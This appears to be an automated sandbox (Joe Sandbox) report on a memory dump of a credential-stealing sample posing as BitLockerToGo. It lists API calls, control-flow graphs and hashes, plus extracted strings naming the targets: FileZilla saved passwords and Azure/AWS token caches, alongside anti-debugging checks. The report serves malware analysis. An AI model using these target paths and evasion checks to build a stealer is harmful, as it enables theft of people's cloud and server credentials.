                                    • Opcode ID: a6bf43770901e76aeafee189239a6d277e6d0c5625f7999a06f6f1576e377ee7
                                    • Instruction ID: 620905acd45006d869851a184c66659ba7f7e2e381adeb0d1b3353ace85a3223
                                    • Opcode Fuzzy Hash: a6bf43770901e76aeafee189239a6d277e6d0c5625f7999a06f6f1576e377ee7
                                    • Instruction Fuzzy Hash: 1D716FB5A01318ABDB14EFA4DC49BEEB778BF44700F508199F50A6F188DBB16A84CF51
                                    APIs
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0306733F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 4630b1f261423eccd2e5f8f6553cc2ee4c8b51755a394c095b3d6f3aa40cadc2
                                    • Instruction ID: 5c85837a2022217e6b4e479a9901b61e66f84e32e97fc9af868d96c1d8954d76
                                    • Opcode Fuzzy Hash: 4630b1f261423eccd2e5f8f6553cc2ee4c8b51755a394c095b3d6f3aa40cadc2
                                    • Instruction Fuzzy Hash: F5F062B1944258EFC700DF99DC49FAEFBB8FB44B21F10061AFA15A3684C7745504CBA1
                                    APIs
                                    • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,030664B7,03070ADA), ref: 0305116A
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InfoSystem
                                    • String ID:
                                    • API String ID: 31276548-0
                                    • Opcode ID: 8a18c2188b5ed8b538cd54db643798a810857626290d9b5add2143aef2469d5f
                                    • Instruction ID: 70e271e13b4811a445da11c8d2ef7b7139cff400f57fba7bcaf98b2054cc36f4
                                    • Opcode Fuzzy Hash: 8a18c2188b5ed8b538cd54db643798a810857626290d9b5add2143aef2469d5f
                                    • Instruction Fuzzy Hash: 93D05E74D0021CDBCB04EFF4A94DADDBB7CBB0C211F004696EC0562244DA305842CA66

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 725 30695e0-30695ea 726 3069a06-3069a9a LoadLibraryA * 8 725->726 727 30695f0-3069a01 725->727 728 3069b16-3069b1d 726->728 729 3069a9c-3069b11 726->729 727->726 731 3069be6-3069bed 728->731 732 3069b23-3069be1 728->732 729->728 733 3069bef-3069c63 731->733 734 3069c68-3069c6f 731->734 732->731 733->734 737 3069d07-3069d0e 734->737 738 3069c75-3069d02 734->738 742 3069d14-3069dea 737->742 743 3069def-3069df6 737->743 738->737 742->743 746 3069e72-3069e79 743->746 747 3069df8-3069e6d 743->747 751 3069eac-3069eb3 746->751 752 3069e7b-3069ea7 746->752 747->746 754 3069ee5-3069eec 751->754 755 3069eb5-3069ee0 751->755 752->751 760 3069fe2-3069fe9 754->760 761 3069ef2-3069fdd 754->761 755->754 771 306a04d-306a054 760->771 772 3069feb-306a048 760->772 761->760 774 306a056-306a069 771->774 775 306a06e-306a075 771->775 772->771 774->775 781 306a077-306a0d3 775->781 782 306a0d8-306a0d9 775->782 781->782
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A0D
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A1E
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A30
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A42
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A53
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A65
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A77
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 1029625771-1775429166
                                    • Opcode ID: 21dbb6831ebf70fda8dbd1de7b03783f973f859e93a70a0b6c403431ac7859bd
                                    • Instruction ID: f8aac620b219318e69d49aaad4791ae371ad51cd1e9d664f6efdb744a2306692
                                    • Opcode Fuzzy Hash: 21dbb6831ebf70fda8dbd1de7b03783f973f859e93a70a0b6c403431ac7859bd
                                    • Instruction Fuzzy Hash: DB6209B6610220EFC754FFB9F88CE1A3BA9BB8C741754D51AE609C324CD734A842DB65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 915 30548d0-3054992 call 306a170 call 3054800 call 306a110 * 5 932 3054994 915->932 933 305499b-305499f 915->933 932->933 934 30549a5-3054b1d call 3068600 call 306a2f0 call 306a270 call 306a1d0 * 2 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a2f0 call 306a270 call 306a1d0 * 2 933->934 935 3054f1b-3054f43 call 306a4a0 call 3059b10 933->935 934->935 1023 3054b23-3054b27 934->1023 948 3054f45-3054f7d call 306a1f0 call 306a380 call 306a270 call 306a1d0 935->948 949 3054f82-3054ff2 call 3068430 * 2 call 306a170 call 306a1d0 * 8 935->949 948->949 1024 3054b35 1023->1024 1025 3054b29-3054b33 1023->1025 1026 3054b3f-3054b72 1024->1026 1025->1026 1028 3054f0e-3054f14 1026->1028 1029 3054b78-3054e78 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a110 call 306a2f0 * 2 call 306a270 call 306a1d0 * 2 call 306a4a0 * 4 1026->1029 1028->935 1143 3054e82-3054eac 1029->1143 1145 3054eb7-3054f09 InternetCloseHandle call 306a1d0 1143->1145 1146 3054eae-3054eb5 1143->1146 1145->1028 1146->1145 1147 3054eb9-3054ef7 call 306a380 call 306a270 call 306a1d0 1146->1147 1147->1143
                                    APIs
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                      • Part of subcall function 03054800: ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                      • Part of subcall function 03054800: InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    • InternetCloseHandle.WININET(00000000), ref: 03054EFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Internet$??2@CloseCrackHandle
                                    • String ID: "$"$------$------$------
                                    • API String ID: 598685214-2180234286
                                    • Opcode ID: f807dd7df8049e3c5b3b935a4c754dee539c1927fa8439b0408a3176331a0d6e
                                    • Instruction ID: ca6b4cac20adf6fff8ec772a6c3f30579e4482045546e7118e21204cc3060913
                                    • Opcode Fuzzy Hash: f807dd7df8049e3c5b3b935a4c754dee539c1927fa8439b0408a3176331a0d6e
                                    • Instruction Fuzzy Hash: 66120BB5A52218AACB14FBA4DC91FEEB378BF94300F104199A5077A094EF706F48CF65

                                    Control-flow Graph

                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                    • ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ??2@CrackInternet
                                    • String ID: <
                                    • API String ID: 836262421-4251816714
                                    • Opcode ID: cfa1d009220bc10682f44f671dc97a2ac528e0a093132d879a000d54544f6e2e
                                    • Instruction ID: 6f8f679f5442c04b51461bb5ea5a05d37cc3e0d452c5b7b91c67d661fcd6f849
                                    • Opcode Fuzzy Hash: cfa1d009220bc10682f44f671dc97a2ac528e0a093132d879a000d54544f6e2e
                                    • Instruction Fuzzy Hash: 9B21FCB5D01208ABDF14EFA4E849BDE7B75FF44320F108225F925AB284EB706A05CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1384 3069270-3069284 call 3069160 1387 30694a3-3069502 LoadLibraryA * 3 1384->1387 1388 306928a-306949e call 3069190 1384->1388 1394 3069504-3069518 1387->1394 1395 306951d-3069524 1387->1395 1388->1387 1394->1395 1396 3069556-306955d 1395->1396 1397 3069526-3069551 1395->1397 1399 306955f-3069573 1396->1399 1400 3069578-306957f 1396->1400 1397->1396 1399->1400 1404 3069581-3069594 1400->1404 1405 3069599-30695a0 1400->1405 1404->1405 1407 30695a2-30695cc 1405->1407 1408 30695d1-30695d2 1405->1408 1407->1408
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?,?,030664A0), ref: 030694AA
                                    • LoadLibraryA.KERNELBASE(?,?,030664A0), ref: 030694BB
                                    • LoadLibraryA.KERNELBASE(?,?,030664A0), ref: 030694DF
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 030695BA
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 1029625771-2781105232
                                    • Opcode ID: 2ffa1d1df9884add14a8801071ef3a26590db6802dd1a110569fc1cd03fd946f
                                    • Instruction ID: 837f84f9a273dff9aaf112c5379ae3c4fdf79d5fb4c7e0aa550097c782974a6a
                                    • Opcode Fuzzy Hash: 2ffa1d1df9884add14a8801071ef3a26590db6802dd1a110569fc1cd03fd946f
                                    • Instruction Fuzzy Hash: 3DA12ABA511220EFC744FFB9F89CE1A3BA9BB8C741750D51AE50AC324CD734A442DB69

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1431 30612b0-30612dd call 306a4a0 1435 30612e7-3061301 call 306a4a0 strtok_s 1431->1435 1436 30612df-30612e1 ExitProcess 1431->1436 1439 3061304-3061308 1435->1439 1440 30614d2-30614dd call 306a1d0 1439->1440 1441 306130e-3061321 1439->1441 1442 3061327-306132a 1441->1442 1443 30614ae-30614cd strtok_s 1441->1443 1445 3061345-3061354 call 306a1f0 1442->1445 1446 3061442-3061453 1442->1446 1447 3061423-3061434 1442->1447 1448 3061480-3061491 1442->1448 1449 3061401-3061412 1442->1449 1450 3061461-3061472 1442->1450 1451 306138f-30613a0 1442->1451 1452 306136d-306137e 1442->1452 1453 3061331-3061340 call 306a1f0 1442->1453 1454 30613df-30613f0 1442->1454 1455 306149f-30614a9 call 306a1f0 1442->1455 1456 30613bd-30613ce 1442->1456 1457 3061359-3061368 call 306a1f0 1442->1457 1443->1439 1445->1443 1489 3061455-3061458 1446->1489 1490 306145f 1446->1490 1487 3061436-3061439 1447->1487 1488 3061440 1447->1488 1479 3061493-3061496 1448->1479 1480 306149d 1448->1480 1485 3061414-3061417 1449->1485 1486 306141e 1449->1486 1475 3061474-3061477 1450->1475 1476 306147e 1450->1476 1477 30613a2-30613ac 1451->1477 1478 30613ae-30613b1 1451->1478 1491 3061380-3061383 1452->1491 1492 306138a 1452->1492 1453->1443 1483 30613f2-30613f5 1454->1483 1484 30613fc 1454->1484 1455->1443 1481 30613d0-30613d3 1456->1481 1482 30613da 1456->1482 1457->1443 1475->1476 1476->1443 1493 30613b8 1477->1493 1478->1493 1479->1480 1480->1443 1481->1482 1482->1443 1483->1484 1484->1443 1485->1486 1486->1443 1487->1488 1488->1443 1489->1490 1490->1443 1491->1492 1492->1443 1493->1443
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: strtok_s$ExitProcess
                                    • String ID: block
                                    • API String ID: 762877946-2199623458
                                    • Opcode ID: 176b30c82a03617a58eaa8d2e73b7053c04d84773877123de9a069d21572aa33
                                    • Instruction ID: 0d09ef97371a8a25478664452b2190ee562476c1650b17322c39e2293206982c
                                    • Opcode Fuzzy Hash: 176b30c82a03617a58eaa8d2e73b7053c04d84773877123de9a069d21572aa33
                                    • Instruction Fuzzy Hash: 525171B4F01209EFCB08EFA4D988AAE77B9BF84704F048548E416BB748D770E955CB65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1494 3066fa0-3066fea 1496 3066ff3-3067067 GetVolumeInformationA call 30687a0 * 3 1494->1496 1497 3066fec 1494->1497 1504 3067078-306707f 1496->1504 1497->1496 1505 3067081-306709a call 30687a0 1504->1505 1506 306709c-30670b7 1504->1506 1505->1504 1512 30670c8-30670f8 call 306a110 1506->1512 1513 30670b9-30670c6 call 306a110 1506->1513 1517 306711e-306712e 1512->1517 1513->1517
                                    APIs
                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0306701F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID: :$C$\
                                    • API String ID: 2039140958-3809124531
                                    • Opcode ID: d961c6be5eb35409846a61746f3a49c87bd930520e9637a5229e53a30fdc22c1
                                    • Instruction ID: 7c472d100c59179c3a6c2c2a96810521120a31ed5c6b046108badda73c34ffd3
                                    • Opcode Fuzzy Hash: d961c6be5eb35409846a61746f3a49c87bd930520e9637a5229e53a30fdc22c1
                                    • Instruction Fuzzy Hash: E841E3B1D01358EBDB10DFA4DC45BEEBBB8BF48704F004499E6096B284D774AA44CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1520 3051220-3051247 call 3068450 GlobalMemoryStatusEx 1523 3051273-305127a 1520->1523 1524 3051249-3051271 call 306d3f0 * 2 1520->1524 1525 3051281-3051285 1523->1525 1524->1525 1528 3051287 1525->1528 1529 305129a-305129d 1525->1529 1531 3051292 1528->1531 1532 3051289-3051290 1528->1532 1531->1529 1532->1529 1532->1531
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0305123E
                                    • __aulldiv.LIBCMT ref: 03051258
                                    • __aulldiv.LIBCMT ref: 03051266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: __aulldiv$GlobalMemoryStatus
                                    • String ID: @
                                    • API String ID: 2185283323-2766056989
                                    • Opcode ID: 440e03f50bfcd08494e8d4554477329139ef672bdce631997b523649752e051c
                                    • Instruction ID: d56b57c806fee6dcf44e8c1b0a942b1b3bca39784bc0e8cf7ab18cc661476dea
                                    • Opcode Fuzzy Hash: 440e03f50bfcd08494e8d4554477329139ef672bdce631997b523649752e051c
                                    • Instruction Fuzzy Hash: A90169B0E41308BBEF14EBE8DC49B9EBBB8EB44705F248049FA04BA1C4C7B455818B59

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 03051160: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,030664B7,03070ADA), ref: 0305116A
                                      • Part of subcall function 03051110: VirtualAllocExNuma.KERNELBASE(00000000,?,?,030664BC), ref: 03051132
                                      • Part of subcall function 03051220: GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0305123E
                                      • Part of subcall function 03051220: __aulldiv.LIBCMT ref: 03051258
                                      • Part of subcall function 03051220: __aulldiv.LIBCMT ref: 03051266
                                    • GetUserDefaultLangID.KERNELBASE ref: 030664C6
                                      • Part of subcall function 030672F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0306733F
                                      • Part of subcall function 03067380: GetComputerNameA.KERNEL32(?,00000104), ref: 030673CF
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoLangMemoryNumaStatusSystemVirtual
                                    • String ID:
                                    • API String ID: 736289943-0
                                    • Opcode ID: 79cb33cb373ffac37eeeabe458c5481abbe9bde5a01ab82240d39c1aca9d85bc
                                    • Instruction ID: 1216239573743fdbaa1f8eb932a9b199bff4ceb5e15c5abfad09b480b2c52ecd
                                    • Opcode Fuzzy Hash: 79cb33cb373ffac37eeeabe458c5481abbe9bde5a01ab82240d39c1aca9d85bc
                                    • Instruction Fuzzy Hash: F0311CB9A42319AACB08FBF4DC55BEE7778AFC4200F004518F9137E188DFB5660586A5
                                    APIs
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 030673CF
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ComputerName
                                    • String ID:
                                    • API String ID: 3545744682-0
                                    • Opcode ID: bf0d592154634232367bba2a437b1a34c2a9d2ffeca332c0ed7840ba31e3e67f
                                    • Instruction ID: cd846028d7d021ffb1e97c0dc48b7863d26dda147c8d39e6f12562aadba157da
                                    • Opcode Fuzzy Hash: bf0d592154634232367bba2a437b1a34c2a9d2ffeca332c0ed7840ba31e3e67f
                                    • Instruction Fuzzy Hash: 750181B1A05209EBC700DF99D949BAEBBB8FB04B25F10061AFA05E3684D7745904CBA1
                                    APIs
                                    • VirtualAllocExNuma.KERNELBASE(00000000,?,?,030664BC), ref: 03051132
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocNumaVirtual
                                    • String ID:
                                    • API String ID: 4233825816-0
                                    • Opcode ID: 55c7c5d1951f1bfc914de74525452d782f670cafc40c070afa323db306e51cce
                                    • Instruction ID: 657586e3985d3d6c52d9155fcf6e95dc09021ff0f95241da7d470b55e898f3d2
                                    • Opcode Fuzzy Hash: 55c7c5d1951f1bfc914de74525452d782f670cafc40c070afa323db306e51cce
                                    • Instruction Fuzzy Hash: BAE0E670945308FBEB54ABA1AC0EB49766CAF04B05F109195FA0DBA1C4C6F525009A59
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,0305114E,?,?,030664BC), ref: 030510B3
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 16f7c8b072293730e9d1dfc116cbc40138ccf5ba5a1b89d09488579310a5472a
                                    • Instruction ID: c21db5efb9e9cd9829b3c5ac364a7454420a31011efe9a2fbcfc89b2a9c840c7
                                    • Opcode Fuzzy Hash: 16f7c8b072293730e9d1dfc116cbc40138ccf5ba5a1b89d09488579310a5472a
                                    • Instruction Fuzzy Hash: 0FF0E272642218BBEB14EAA5AC49FABF7D8A705B04F305548F900E7280D571AE008AA0
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0306B562
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0306B577
                                    • UnhandledExceptionFilter.KERNEL32(0306F298), ref: 0306B582
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0306B59E
                                    • TerminateProcess.KERNEL32(00000000), ref: 0306B5A5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: fcf7ef436a2aa4c7d0be2b0e9ac18ca4c9b98e3fee7739398ebec5b79f67f39b
                                    • Instruction ID: 903faf791e6ce3be03a3a91fdce7c67fcaddbe4d8d2b6796fbde76a4a9173f83
                                    • Opcode Fuzzy Hash: fcf7ef436a2aa4c7d0be2b0e9ac18ca4c9b98e3fee7739398ebec5b79f67f39b
                                    • Instruction Fuzzy Hash: EF21DFB8D03344DFE710FF69E288A643BA4BB48314F50405AE50AFBA4DE7B85984CF55
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0306C8DE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 90b039a6e4bdb55adf563ae20f8c0bf2fadb024ef6e8210c84f13aaad122804a
                                    • Instruction ID: e087a4bc5d83fb0ab1484af33c9eb8008bfce003376d153537b0d579427406a8
                                    • Opcode Fuzzy Hash: 90b039a6e4bdb55adf563ae20f8c0bf2fadb024ef6e8210c84f13aaad122804a
                                    • Instruction Fuzzy Hash: 9D9002A8253604DFB620A7749A0941D29D05A885127451850B155C804DEA6840849561
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                    • strtok_s.MSVCRT ref: 0306015B
                                    • memset.MSVCRT ref: 0306051D
                                      • Part of subcall function 03068380: malloc.MSVCRT ref: 03068388
                                      • Part of subcall function 03068380: strncpy.MSVCRT ref: 030683A3
                                    • strtok_s.MSVCRT ref: 030604B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: strtok_s$mallocmemsetstrncpy
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2676359353-555421843
                                    • Opcode ID: 9a912b0b8c1eb2ab8423b07e30ccad0bfb4588647e264f766ce42653d8061360
                                    • Instruction ID: 183a345721713e7746afe02885bdaeef6e82231da7e48e39eb8126716ac267da
                                    • Opcode Fuzzy Hash: 9a912b0b8c1eb2ab8423b07e30ccad0bfb4588647e264f766ce42653d8061360
                                    • Instruction Fuzzy Hash: 39D11FB5E41208ABCB04FBF4DC59EEE7778BF94300F508518F502BA189EA74AA45CB65
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 2221118986-974132213
                                    • Opcode ID: 0d7d3271e5f177cf669a036326fc7005e3e54c5dddec308fbdc8b52c04b00c65
                                    • Instruction ID: 3e5765b4fdaa50ecd3c6e8422d75c96e3dabfa2cea3852ab88f4dc1f452b4e03
                                    • Opcode Fuzzy Hash: 0d7d3271e5f177cf669a036326fc7005e3e54c5dddec308fbdc8b52c04b00c65
                                    • Instruction Fuzzy Hash: 2141D6BDE42304ABCB14FB60EC4AFDD773C9F94700F408554B649AA085EEB467898B95
                                    APIs
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                      • Part of subcall function 03054800: ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                      • Part of subcall function 03054800: InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    • memcpy.MSVCRT ref: 03055F16
                                    • memcpy.MSVCRT ref: 03055F4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memcpy$??2@CrackInternet
                                    • String ID: "$"$------$------$------
                                    • API String ID: 2992602757-2180234286
                                    • Opcode ID: 7781a3466355eb33b026095158d4d0cd3e861f4838427e863bcf0ed935a6bcdd
                                    • Instruction ID: 672b60fc96e370456c7e830eaddbcda2f558eaed67304c21dca42da4ab7755be
                                    • Opcode Fuzzy Hash: 7781a3466355eb33b026095158d4d0cd3e861f4838427e863bcf0ed935a6bcdd
                                    • Instruction Fuzzy Hash: 7A121EB5962228ABCB14FBA4DC94FEEB378BF94700F404199B5077A094DF716B48CB64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 0-2524465048
                                    • Opcode ID: 0b0355dc1b839e8babd2d0bb1bf81017348c2fb3d56cda18870a90095a9a679d
